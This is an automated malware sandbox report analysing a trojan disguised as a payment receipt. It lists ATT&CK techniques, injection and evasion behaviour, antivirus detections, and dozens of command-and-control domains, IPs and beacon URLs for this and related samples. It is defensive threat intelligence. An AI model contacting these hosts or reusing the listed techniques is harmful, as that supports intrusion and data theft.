          Valid Accounts1Shared Modules1Valid Accounts1Valid Accounts1Valid Accounts1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsAccess Token Manipulation1Access Token Manipulation1LSASS MemorySecurity Software Discovery141Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Process Injection612Virtualization/Sandbox Evasion2Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing1DCSyncSystem Information Discovery114Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 510324 Sample: Betalingskvittering.exe Startdate: 27/10/2021 Architecture: WINDOWS Score: 100 31 www.redeyeops.com 2->31 39 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->39 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 4 other signatures 2->45 11 Betalingskvittering.exe 17 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\...\nkcyodylqw.dll, PE32 11->29 dropped 59 Tries to detect virtualization through RDTSC time measurements 11->59 61 Injects a PE file into a foreign processes 11->61 15 Betalingskvittering.exe 11->15         started        signatures6 process7 signatures8 63 Modifies the context of a thread in another process (thread injection) 15->63 65 Maps a DLL or memory area into another process 15->65 67 Sample uses process hollowing technique 15->67 69 Queues an APC in another process (thread injection) 15->69 18 explorer.exe 15->18 injected process9 dnsIp10 33 improvfilmproduction.com 50.87.176.30, 49790, 80 UNIFIEDLAYER-AS-1US United States 18->33 35 bbyyn10.xyz 142.4.98.67, 49834, 80 PEGTECHINCUS United States 18->35 37 18 other IPs or domains 18->37 47 System process connects to network (likely due to code injection or exploit) 18->47 49 Performs DNS queries to domains with low reputation 18->49 22 cmd.exe 18->22         started        signatures11 process12 signatures13 51 Self deletion via cmd delete 22->51 53 Modifies the context of a thread in another process (thread injection) 22->53 55 Maps a DLL or memory area into another process 22->55 57 Tries to detect virtualization through RDTSC time measurements 22->57 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Betalingskvittering.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.0.Betalingskvittering.exe.400000.0.unpack100%AviraTR/Patched.Ren.Gen2Download File
          1.1.Betalingskvittering.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.cmd.exe.295d8d0.1.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.0.Betalingskvittering.exe.400000.3.unpack100%AviraTR/Patched.Ren.Gen2Download File
          0.2.Betalingskvittering.exe.f010000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.Betalingskvittering.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.Betalingskvittering.exe.400000.2.unpack100%AviraTR/Patched.Ren.Gen2Download File
          1.0.Betalingskvittering.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.Betalingskvittering.exe.400000.1.unpack100%AviraTR/Patched.Ren.Gen2Download File
          7.2.cmd.exe.31b796c.4.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.2.Betalingskvittering.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.Betalingskvittering.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          1.0.Betalingskvittering.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.0.Betalingskvittering.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File

          Domains

          SourceDetectionScannerLabelLink
          bobazzing.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.malatirada.com/b0us/?ER-tHjR=nj2DHCJ30hKQOuuh7v1Jr5ANXhhKiZRTWmKDhPt9Qsa3u7kG0yWlFw/1cLMOhBLADgukMw6nkg==&7nB=o48X0%Avira URL Cloudsafe
          http://www.finansresultation.com/b0us/?7nB=o48X&ER-tHjR=GJwWehbs5GtgA/jCTmLXW+d7Jevtba1jivkLJpCykHSB4/chqGbz0ZWPyKEW0KJPwZtZaAylaQ==0%Avira URL Cloudsafe
          www.bbyyn10.xyz/b0us/100%Avira URL Cloudphishing
          http://www.improvfilmproduction.com/b0us/?ER-tHjR=XOV60v1mqekMspvFU+0rKPDlyXSEiaRHynKCSPj1mvOyDA4pkDpWyOZGigF6MKTilgG5HmfPXw==&7nB=o48X0%Avira URL Cloudsafe
          http://www.joystoreworld.com/b0us/?7nB=o48X&ER-tHjR=gHtktScKtff4xVk3YRyKSNbVreJpCBobm1IhD3pS9EMOhSghOP3G/JLMMDt6OL3q2Wx4R+w5Og==0%Avira URL Cloudsafe
          http://www.rxgmarket.com/b0us/?ER-tHjR=Jj3KnWU2wHfhK+BlDqyhqSxeJEURVrle6TPUvLIqsqCsrOVtG9y5Fb94G4BOAz9I+plsxBUl/Q==&7nB=o48X0%Avira URL Cloudsafe
          http://www.bobazzing.com/b0us/?7nB=o48X&ER-tHjR=UBAh+VKzDimqRzzQdOOZ1/Gg43oaZbQvrcwMwq1yQU/lFkYIOb3JKuxkIDajXNdZJrP2FICqIQ==0%Avira URL Cloudsafe
          http://www.bbyyn10.xyz/b0us/?ER-tHjR=uvxArRkDFQIa7UH5wTzWyAGdj7XK8ywupwRjYW67zA7TlC7ZzzoRfWk1xHO/TMl+lIlca6RFKw==&7nB=o48X100%Avira URL Cloudphishing
          http://www.olympiaapartment.com/b0us/?7nB=o48X&ER-tHjR=IHm7DXqJMOlXRiIvQCzDYuNSepBShfVGHLx9uFm0ofOXeJBRLox1psSi4oyGmyzdtrRcHIstiA==0%Avira URL Cloudsafe
          http://www.insularrofioa.xyz/b0us/?ER-tHjR=NeMtgU3TUqkyahWOuk7UbKtu2f6OPWemmRyjHCkgk8lKJDy56aFQiEm/TJxXDeQeO1MybhrnKA==&7nB=o48X0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          inkedbreadcompany.com
          34.102.136.180
          truefalse
            unknown
            malatirada.com
            192.0.78.25
            truetrue
              unknown
              www.finansresultation.com
              104.21.40.182
              truetrue
                unknown
                parkingpage.namecheap.com
                198.54.117.217
                truefalse
                  high
                  bobazzing.com
                  34.102.136.180
                  truefalseunknown
                  www.rxgmarket.com
                  104.21.45.211
                  truetrue
                    unknown
                    shops.myshopify.com
                    23.227.38.74
                    truetrue
                      unknown
                      bbyyn10.xyz
                      142.4.98.67
                      truetrue
                        unknown
                        improvfilmproduction.com
                        50.87.176.30
                        truetrue
                          unknown
                          www.olympiaapartment.com
                          35.186.238.101
                          truefalse
                            unknown
                            www.bbyyn10.xyz
                            unknown
                            unknowntrue
                              unknown
                              www.chimichael.com
                              unknown
                              unknowntrue
                                unknown
                                www.redeyeops.com
                                unknown
                                unknowntrue
                                  unknown
                                  www.inkedbreadcompany.com
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.malatirada.com
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.insularrofioa.xyz
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.bobazzing.com
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.improvfilmproduction.com
                                          unknown
                                          unknowntrue
                                            unknown
                                            www.joystoreworld.com
                                            unknown
                                            unknowntrue
                                              unknown
                                              www.tucows.website
                                              unknown
                                              unknowntrue
                                                unknown

                                                Contacted URLs

                                                NameMaliciousAntivirus DetectionReputation
                                                http://www.malatirada.com/b0us/?ER-tHjR=nj2DHCJ30hKQOuuh7v1Jr5ANXhhKiZRTWmKDhPt9Qsa3u7kG0yWlFw/1cLMOhBLADgukMw6nkg==&7nB=o48Xtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.finansresultation.com/b0us/?7nB=o48X&ER-tHjR=GJwWehbs5GtgA/jCTmLXW+d7Jevtba1jivkLJpCykHSB4/chqGbz0ZWPyKEW0KJPwZtZaAylaQ==true
                                                • Avira URL Cloud: safe
                                                unknown
                                                www.bbyyn10.xyz/b0us/true
                                                • Avira URL Cloud: phishing
                                                low
                                                http://www.improvfilmproduction.com/b0us/?ER-tHjR=XOV60v1mqekMspvFU+0rKPDlyXSEiaRHynKCSPj1mvOyDA4pkDpWyOZGigF6MKTilgG5HmfPXw==&7nB=o48Xtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.joystoreworld.com/b0us/?7nB=o48X&ER-tHjR=gHtktScKtff4xVk3YRyKSNbVreJpCBobm1IhD3pS9EMOhSghOP3G/JLMMDt6OL3q2Wx4R+w5Og==true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.rxgmarket.com/b0us/?ER-tHjR=Jj3KnWU2wHfhK+BlDqyhqSxeJEURVrle6TPUvLIqsqCsrOVtG9y5Fb94G4BOAz9I+plsxBUl/Q==&7nB=o48Xtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.bobazzing.com/b0us/?7nB=o48X&ER-tHjR=UBAh+VKzDimqRzzQdOOZ1/Gg43oaZbQvrcwMwq1yQU/lFkYIOb3JKuxkIDajXNdZJrP2FICqIQ==false
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.bbyyn10.xyz/b0us/?ER-tHjR=uvxArRkDFQIa7UH5wTzWyAGdj7XK8ywupwRjYW67zA7TlC7ZzzoRfWk1xHO/TMl+lIlca6RFKw==&7nB=o48Xtrue
                                                • Avira URL Cloud: phishing
                                                unknown
                                                http://www.olympiaapartment.com/b0us/?7nB=o48X&ER-tHjR=IHm7DXqJMOlXRiIvQCzDYuNSepBShfVGHLx9uFm0ofOXeJBRLox1psSi4oyGmyzdtrRcHIstiA==false
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.insularrofioa.xyz/b0us/?ER-tHjR=NeMtgU3TUqkyahWOuk7UbKtu2f6OPWemmRyjHCkgk8lKJDy56aFQiEm/TJxXDeQeO1MybhrnKA==&7nB=o48Xtrue
                                                • Avira URL Cloud: safe
                                                unknown

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000004.00000000.388648434.000000000095C000.00000004.00000020.sdmpfalse
                                                  high
                                                  http://nsis.sf.net/NSIS_ErrorBetalingskvittering.exefalse
                                                    high
                                                    http://nsis.sf.net/NSIS_ErrorErrorBetalingskvittering.exefalse
                                                      high

                                                      Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      198.54.117.217
                                                      parkingpage.namecheap.comUnited States
                                                      22612NAMECHEAP-NETUSfalse
                                                      35.186.238.101
                                                      www.olympiaapartment.comUnited States
                                                      15169GOOGLEUSfalse
                                                      192.0.78.25
                                                      malatirada.comUnited States
                                                      2635AUTOMATTICUStrue
                                                      142.4.98.67
                                                      bbyyn10.xyzUnited States
                                                      54600PEGTECHINCUStrue
                                                      50.87.176.30
                                                      improvfilmproduction.comUnited States
                                                      46606UNIFIEDLAYER-AS-1UStrue
                                                      104.21.45.211
                                                      www.rxgmarket.comUnited States
                                                      13335CLOUDFLARENETUStrue
                                                      34.102.136.180
                                                      inkedbreadcompany.comUnited States
                                                      15169GOOGLEUSfalse
                                                      23.227.38.74
                                                      shops.myshopify.comCanada
                                                      13335CLOUDFLARENETUStrue
                                                      104.21.40.182
                                                      www.finansresultation.comUnited States
                                                      13335CLOUDFLARENETUStrue

                                                      General Information

                                                      Joe Sandbox Version:33.0.0 White Diamond
                                                      Analysis ID:510324
                                                      Start date:27.10.2021
                                                      Start time:17:48:33
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 9m 54s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:light
                                                      Sample file name:Betalingskvittering.exe
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                      Number of analysed new started processes analysed:22
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:1
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal100.troj.evad.winEXE@7/2@13/9
                                                      EGA Information:Failed
                                                      HDC Information:
                                                      • Successful, ratio: 11.8% (good quality ratio 10.8%)
                                                      • Quality average: 72.1%
                                                      • Quality standard deviation: 31.3%
                                                      HCA Information:
                                                      • Successful, ratio: 74%
                                                      • Number of executed functions: 0
                                                      • Number of non-executed functions: 0
                                                      Cookbook Comments:
                                                      • Adjust boot time
                                                      • Enable AMSI
                                                      • Found application associated with file extension: .exe
                                                      Warnings:
                                                      Show All
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                      • TCP Packets have been reduced to 100
                                                      • Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.82.210.154, 173.222.108.210, 173.222.108.226, 20.54.110.249, 40.112.88.60, 80.67.82.235, 80.67.82.211, 23.211.4.86
                                                      • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                      • Not all processes where analyzed, report is missing behavior information

                                                      Simulations

                                                      Behavior and APIs

                                                      No simulations

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      198.54.117.217HTK TT600202109300860048866 Payment Proof.pdf.exeGet hashmaliciousBrowse
                                                      • www.linuxsauce.net/euzn/?BZLHP=YcuDf72PrLj9v77cTtT+RdHZgYXigAT3c+U/UJpKvp19BOyUsvC11+Bo5KkRiH0TT7aa&TlTd=3fQxPL6PF
                                                      pGaL44AsT9.exeGet hashmaliciousBrowse
                                                      • www.gabriellamaxey.com/mxnu/?u6t=ThxXNBv89HE4&LZZxUjSP=DbmmFAt1aOxcCApgO6w979pQn2fp6kjdxew91QKgTI9qvdDZbTwBXJG52e+oCdqw4zUT2TPOEA==
                                                      vaOHjT0co0.exeGet hashmaliciousBrowse
                                                      • www.rh-et.com/hht8/?c4i4Bzu8=YYzUAHMmBpkaBxQecPevm2uxv/AgOlZRAEO+xcULTvAxNOfYBsVeCIlohnhUDcjiLYP5&uP=TnXTAHPPhFZp5fG0
                                                      D6EXhDKWrd.exeGet hashmaliciousBrowse
                                                      • www.mariadimitropoulou.com/noha/?3f-DJJ=OpI7f+0I7wz69HYhh96y4UfCxqU+B78KM76J860qGty5m2eJLl5CyDdv9lUYB30OtSbI&gd=Zxox
                                                      eaeqZtiivz.exeGet hashmaliciousBrowse
                                                      • www.gabriellamaxey.com/mxnu/?Y0GX7pLH=DbmmFAt1aOxcCApgO6w979pQn2fp6kjdxew91QKgTI9qvdDZbTwBXJG52eyoRNmzhjUF&0vB0i=8pIDRx4
                                                      d0c7488tr739.exeGet hashmaliciousBrowse
                                                      • www.noveltyrofjiy.xyz/u5eh/?sR0pj=RL30&d6A=HQwXNFwoB6n+YGXI3oGKCBkeNArRdglGFGwIL3CxiqbCTaQLC90OuFmH9gPLa3p+A/gJ
                                                      ORD2021100866752371AC.exeGet hashmaliciousBrowse
                                                      • www.24x7x366.com/gab8/?Y0Dx=k9y8d/XvYtKBLjwbt29axTfvzRBwxbjjmcfovaX0vrzPSMlBKv9voE/DCePWwHj/NYwY&nL3lC0=IxlpdH_xnP2
                                                      Scan_34668000.exeGet hashmaliciousBrowse
                                                      • www.rcdating.com/yjqn/?gHd=SJH122Bxba+bszdGdvPgzkJhaNlQ8BfIPC5UroK/FhtQFKGwLmgtuwvUsOAh6prSrkUZ4vn5oA==&hZP=ldMHgdcxDFU
                                                      Swift Copy.exeGet hashmaliciousBrowse
                                                      • www.ahktips.com/eods/?aBC8lvE=gr9/MU9R+Yb+ym3qu/cgmvjNsm8J65aE4ndR2EOILnYjdHNbTnRo0AVU5jWKfEfcUHZh&G4=Tbut2rPX
                                                      HPMT ORDER LIST.exeGet hashmaliciousBrowse
                                                      • www.solmep.info/n6be/?a6=kFO5GiJEltEyuD14fKksMWyfXyXOXLYRAJ6sNogu4SNNFIYLrFMp5gPNqUGPKnTkMW34&4hYl=8pPLKztPMLrhEvWP
                                                      Cl8RbDkHcC.exeGet hashmaliciousBrowse
                                                      • www.serpasboutiquedecarnes.com/mjyv/?0HzpcX=GHHu5aI1fnsie8656YDOT+LAztXxb9x2KscrCthUOJJ7/YsjGk80/pPjBXBwBSR8PTi4x5qn+w==&nN=BTntMX1
                                                      SBGW#001232021.exeGet hashmaliciousBrowse
                                                      • www.burnabytowtruck.com/etaf/?6lttpr=AEMTqKbuQHMy6OGu7QAPFQjWRaS7/TLQ/9+S+kY5i3qqw9hxTQyayBEnz2sH/Hv/bqA7&JFND6z=_84lfN-p
                                                      Updated SOA 210920.PDF.exeGet hashmaliciousBrowse
                                                      • www.honeymaroc.com/ny9y/?SDH8q=KzrTopIpRT&T2Jp=IxL6aa9POVk2/nLI/TTHWUW0ayULExkH1BvNm/J+AIAeJy2IV/WFxaIlCH38IBuCkgnD
                                                      Bank Swift Scan pdf.exeGet hashmaliciousBrowse
                                                      • www.breakfastatbrittanys.com/di4c/?G0G=PBupkdaXnhk&od=eONJhOU0iPpRcHoncBMkBH/I39GU+8VlVflgHNq1AXvm36M2WTxvIfziEkhUCvplRe0f
                                                      truck pictures.exeGet hashmaliciousBrowse
                                                      • www.traderjoes-corp.com/cuig/?yTbXp6=D2cITgXAP54inNVSGd0jjZ70qoeAqEVTVUklQDxR8W4bcHn55PazcIr3ilQJX4YXDdO+&9rKPkT=2dfXcPxP_
                                                      Orsha_NSC Contract 290720 Order for new shipment.xlsxGet hashmaliciousBrowse
                                                      • www.asteroid.finance/b6a4/?l2J=9rutZVDXu850SJr&c0DH=qLtgNToVxwGBDLV3pgf7fmc+nXqwhZnGR9zX0c9pvpxyA4sUtmU5qFwMTQzWzRvD1UNyKQ==
                                                      PO747484992.exeGet hashmaliciousBrowse
                                                      • www.puravidaceuticals.com/i9nz/?F2JHEXoP=sr8sB85/9jXzXvsDoLcXfgv5W+iXND+2C7ErOGWvNyFtEWMFH/Qc7Jksnr/Ge8yFxs3b&cbrD=Urop
                                                      YgAynTdpcncdnG4.exeGet hashmaliciousBrowse
                                                      • www.listotwarty.net/c8ec/?g8LhOf9X=9kJmm5jq4+Scs8x1p1AmwQNwu7JKgzztT1FjvwsiqFLJpMHcpTtwSq3T1y9GRU+A/5g4&p2M=SN6LU2tHzzlXS8
                                                      GosMzUpnGu.exeGet hashmaliciousBrowse
                                                      • www.sewmenship.com/rqe8/?s48tpP=5jDD&f81Ludbx=Ol8e0pkv5jqXu1bpp/M/YlDE69Xif3SEJEPQHpmlqEU4QgudPLiFM5P+hjjw4+q0GSrM
                                                      TPAYWUFxTV.exeGet hashmaliciousBrowse
                                                      • www.tianconghuo.club/kzk9/?oXIxyz4=D61rAPfTKbs2fBSgXwtfSb/i2DxzAhnQY0zC+1Bk9ZPL8tgAxhUB/kywMfA8gC1BXeBV&eJE=B6APwX8

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      parkingpage.namecheap.comPayment Advice.exeGet hashmaliciousBrowse
                                                      • 198.54.117.215
                                                      payment advice0272110.exeGet hashmaliciousBrowse
                                                      • 198.54.117.215
                                                      DHL.exeGet hashmaliciousBrowse
                                                      • 198.54.117.212
                                                      Order of CB-15GL PO530_pdf.exeGet hashmaliciousBrowse
                                                      • 198.54.117.212
                                                      RFQ_PI02102110.exeGet hashmaliciousBrowse
                                                      • 198.54.117.216
                                                      cNOilTxTR3.exeGet hashmaliciousBrowse
                                                      • 198.54.117.218
                                                      lCFjxhAqu3.exeGet hashmaliciousBrowse
                                                      • 198.54.117.212
                                                      Amended Order.xlsxGet hashmaliciousBrowse
                                                      • 198.54.117.215
                                                      OS-QTN-0320-21-Rev1.exeGet hashmaliciousBrowse
                                                      • 198.54.117.210
                                                      1.exeGet hashmaliciousBrowse
                                                      • 198.54.117.215
                                                      DRAFT CONTRACT 0000499000-1100928777-pdf.exeGet hashmaliciousBrowse
                                                      • 198.54.117.211
                                                      U8NUCQkg3s.exeGet hashmaliciousBrowse
                                                      • 198.54.117.218
                                                      #U041a#U0430#U0441#U043e#U0432#U0430 #U0431#U0435#U043b#U0435#U0436#U043a#U0430.exeGet hashmaliciousBrowse
                                                      • 198.54.117.216
                                                      triage_dropped_file.exeGet hashmaliciousBrowse
                                                      • 198.54.117.212
                                                      2500010PO.excel.exeGet hashmaliciousBrowse
                                                      • 198.54.117.216
                                                      MAERSK LINE SHIPPING DOCUMENT_pdf.exeGet hashmaliciousBrowse
                                                      • 198.54.117.212
                                                      triage_dropped_file.exeGet hashmaliciousBrowse
                                                      • 198.54.117.212
                                                      F9ObnUc4ol.exeGet hashmaliciousBrowse
                                                      • 198.54.117.211
                                                      notification@dhl.com,pdf.exeGet hashmaliciousBrowse
                                                      • 198.54.117.217
                                                      _Payment Advise.docGet hashmaliciousBrowse
                                                      • 198.54.117.210
                                                      shops.myshopify.compayment advice0272110.exeGet hashmaliciousBrowse
                                                      • 23.227.38.74
                                                      E1PGk0W2AH.exeGet hashmaliciousBrowse
                                                      • 23.227.38.74
                                                      Order of CB-15GL PO530_pdf.exeGet hashmaliciousBrowse
                                                      • 23.227.38.74
                                                      cNOilTxTR3.exeGet hashmaliciousBrowse
                                                      • 23.227.38.74
                                                      Unpaid invoice.exeGet hashmaliciousBrowse
                                                      • 23.227.38.74
                                                      Original Shipping documents.docGet hashmaliciousBrowse
                                                      • 23.227.38.74
                                                      85dpq7juao.exeGet hashmaliciousBrowse
                                                      • 23.227.38.74
                                                      New Order 785298600.docGet hashmaliciousBrowse
                                                      • 23.227.38.74
                                                      Order Requiremnt-Oct-2021.exeGet hashmaliciousBrowse
                                                      • 23.227.38.74
                                                      PO4502151388.excel.exeGet hashmaliciousBrowse
                                                      • 23.227.38.74
                                                      Minutes of Meeting 23.10.2021.exeGet hashmaliciousBrowse
                                                      • 23.227.38.74
                                                      SHIPPING DOCUMENT.exeGet hashmaliciousBrowse
                                                      • 23.227.38.74
                                                      DHL_119040 receipt document,pdf.exeGet hashmaliciousBrowse
                                                      • 23.227.38.74
                                                      F30AGnBthja6Ka2.exeGet hashmaliciousBrowse
                                                      • 23.227.38.74
                                                      ouB4vwDfpl.exeGet hashmaliciousBrowse
                                                      • 23.227.38.74
                                                      Remittance_Advice.exeGet hashmaliciousBrowse
                                                      • 23.227.38.74
                                                      DMS210949 MV LYDERHORN LOW MIX RATIO.xlsxGet hashmaliciousBrowse
                                                      • 23.227.38.74
                                                      Ot4xf3fDJu.exeGet hashmaliciousBrowse
                                                      • 23.227.38.74
                                                      RFQ REF R22017582.xlsxGet hashmaliciousBrowse
                                                      • 23.227.38.74
                                                      SDL_Order Onay#U0131 _ Acil,pdf.exeGet hashmaliciousBrowse
                                                      • 23.227.38.74

                                                      ASN

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      NAMECHEAP-NETUS10272021-AM65Application.HTMGet hashmaliciousBrowse
                                                      • 104.219.248.99
                                                      Payment Advice.exeGet hashmaliciousBrowse
                                                      • 198.54.117.215
                                                      Tfwyelel3H.exeGet hashmaliciousBrowse
                                                      • 192.64.119.254
                                                      QQIksbWrVl.exeGet hashmaliciousBrowse
                                                      • 63.250.40.204
                                                      SKGCM_YAHYA AZHEBS#U0130 Ponuda proizvoda7.exeGet hashmaliciousBrowse
                                                      • 198.54.126.156
                                                      DUT2Aj4C2x.exeGet hashmaliciousBrowse
                                                      • 185.61.153.108
                                                      Swift Payment Notification.xlsxGet hashmaliciousBrowse
                                                      • 63.250.40.204
                                                      MT103USD.xlsxGet hashmaliciousBrowse
                                                      • 63.250.40.204
                                                      DHL_document11022020680908911.exeGet hashmaliciousBrowse
                                                      • 198.54.114.114
                                                      payment advice0272110.exeGet hashmaliciousBrowse
                                                      • 198.54.117.215
                                                      R0ptlo2GB2.exeGet hashmaliciousBrowse
                                                      • 63.250.40.204
                                                      QRT#U00a0(20211027#00001)#U00a0ACSAM-6000RC Quote.exeGet hashmaliciousBrowse
                                                      • 63.250.40.204
                                                      Order.exeGet hashmaliciousBrowse
                                                      • 192.64.119.74
                                                      PNkEr1lc2k.exeGet hashmaliciousBrowse
                                                      • 63.250.40.204
                                                      Enquiry docs_001.exeGet hashmaliciousBrowse
                                                      • 63.250.40.204
                                                      PO 211027-031A.exeGet hashmaliciousBrowse
                                                      • 63.250.40.204
                                                      PO_SBK4128332S.exeGet hashmaliciousBrowse
                                                      • 198.54.114.114
                                                      DHL.exeGet hashmaliciousBrowse
                                                      • 198.54.117.212
                                                      payment advice_16000.exeGet hashmaliciousBrowse
                                                      • 198.187.31.161
                                                      SffoWy1XRL.exeGet hashmaliciousBrowse
                                                      • 63.250.40.204
                                                      AUTOMATTICUSpayment advice0272110.exeGet hashmaliciousBrowse
                                                      • 192.0.78.24
                                                      DDEEBC8CCCC58E25CE1709B0E9A519B2BD46472E92860.exeGet hashmaliciousBrowse
                                                      • 74.114.154.18
                                                      B64AB676FFE01925ADC506EEBCC62F6EDC901E017C339.exeGet hashmaliciousBrowse
                                                      • 74.114.154.22
                                                      p3IJWYfJZw.exeGet hashmaliciousBrowse
                                                      • 74.114.154.18
                                                      rrte40912.exeGet hashmaliciousBrowse
                                                      • 192.0.78.24
                                                      DHL DOC ARRIVAL#20008.exeGet hashmaliciousBrowse
                                                      • 192.0.78.250
                                                      obizx.exeGet hashmaliciousBrowse
                                                      • 192.0.78.25
                                                      6FD5C640F4C1E434978FDC59A8EC191134B7155217C84.exeGet hashmaliciousBrowse
                                                      • 74.114.154.18
                                                      triage_dropped_file.exeGet hashmaliciousBrowse
                                                      • 192.0.78.25
                                                      seasonzx.exeGet hashmaliciousBrowse
                                                      • 192.0.78.25
                                                      AB948F038175411DC326A1AAD83DF48D6B65632501551.exeGet hashmaliciousBrowse
                                                      • 74.114.154.22
                                                      365F984ABE68DDD398D7B749FB0E69B0F29DAF86F0E3E.exeGet hashmaliciousBrowse
                                                      • 74.114.154.22
                                                      C03C8A4852301C1C54ED27EF130D0DE4CDFB98584ADEF.exeGet hashmaliciousBrowse
                                                      • 74.114.154.22
